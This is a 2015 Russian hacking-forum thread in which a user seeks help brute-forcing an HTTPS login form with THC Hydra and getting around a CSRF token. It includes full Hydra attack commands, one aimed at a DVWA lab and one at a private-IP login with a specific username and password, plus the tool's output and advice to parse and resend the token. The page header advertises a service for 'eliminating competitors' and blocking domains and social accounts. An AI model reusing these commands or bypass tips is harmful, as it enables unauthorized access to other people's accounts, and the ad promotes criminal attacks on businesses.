hydra & CRSF

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
hydra & CRSF

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

13.10.2015, 16:18

user6334

Участник форума

Регистрация: 29.06.2015

Сообщений: 296

С нами: 5723606

Репутация: 12

Не получается у меня брутить веб-форму по https. Выдает ошибку подключения. Почитал здесь: https://github.com/vanhauser-thc/thc-hydra/issues/40 , и пришел к выводу, что это CRSF-токен мешает. Какие есть способы это обойти? Помогите!

𝕏 Twitter Reddit Telegram Копировать ссылку

13.10.2015, 16:49

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

спарсить токен, отправить вместе с ним

13.10.2015, 17:05

user6334

Участник форума

Регистрация: 29.06.2015

Сообщений: 296

С нами: 5723606

Репутация: 12

а можно поподробнее? каким образом токен передается? В куки? А как команду для гидры написать, чтобы она куки передавала?

13.10.2015, 18:46

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

вряд ли, но зависит от реализации. в гидре - не знаю, самописным софтом запросто

14.10.2015, 07:13

user6334

Участник форума

Регистрация: 29.06.2015

Сообщений: 296

С нами: 5723606

Репутация: 12

hydra -s 443 -L users.txt -P pass.txt -e nsr 10.10.1.10 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Lo gin:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=k73vfi85vvna3mchopebmcgc43"

Может так?

14.10.2015, 11:27

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

я, честно, еще пока даже не уверен, что проблема из-за CSRF токена. покажите полный и нормальный отснифанный запрос

14.10.2015, 13:13

user6334

Участник форума

Регистрация: 29.06.2015

Сообщений: 296

С нами: 5723606

Репутация: 12

Может, и не из-за токена

master@limimate ~/hydra-8.1 $ hydra -l nichenkoOV -p vfvfjkz -f -V 192.168.247.198 https-post-form "/index.php?login=yes:AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=^USER^ &USER_PASSWORD=^PASS^:Неправильный логин или пароль" -s 443

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-10-14 12:10:55

[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task

[DATA] attacking service http-post-form on port 443 with SSL

[ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 631 terminating, cannot connect

[RE-ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 632 terminating, cannot connect

[RE-ATTEMPT] target 192.168.247.198 - login "nichenkoOV" - pass "vfvfjkz" - 1 of 1 [child 0]

[ERROR] Child with pid 633 terminating, cannot connect

[STATUS] attack finished for 192.168.247.198 (waiting for children to finish) ...

1 of 1 target completed, 0 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-10-14 12:10:55